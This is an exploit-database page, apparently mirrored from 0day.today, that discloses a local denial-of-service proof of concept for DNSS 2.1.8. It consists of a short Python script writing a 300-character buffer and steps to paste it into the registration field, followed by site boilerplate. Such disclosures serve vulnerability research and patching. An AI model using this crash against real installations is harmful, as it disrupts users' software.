Lucene search
K

DNSS 2.1.8 - Denial of Service Exploit

🗓️ 13 May 2019 00:00:00Reported by Victor MondragónType 
zdt
 zdt
🔗 0day.today👁 14 Views

DNSS 2.1.8 - Denial of Service Exploit, discovered by Victor Mondragón and tested on Windows 10 Single Language x64 / 7 x64 Service Pack 1. The exploit involves crashing the software by pasting a specific code into the registration field

Code
#Exploit Title: DNSS Domain Name Search Software 2.1.8 -  Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Vendor Homepage: www.nsauditor.com 
#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
#Tested Version: 2.1.8
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: DNSS_2.1.8.py
#2.- Open DNSS.txt and copy content to clipboard
#3.- Open Dnss
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name/Key" paste Clipboard
#6.- Click "Ok"
#7.- Crarshed
 
cod = "\x41" * 300
 
f = open('DNSS.txt', 'w')
f.write(cod)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 May 2019 00:00Current
7.4High risk
Vulners AI Score7.4
14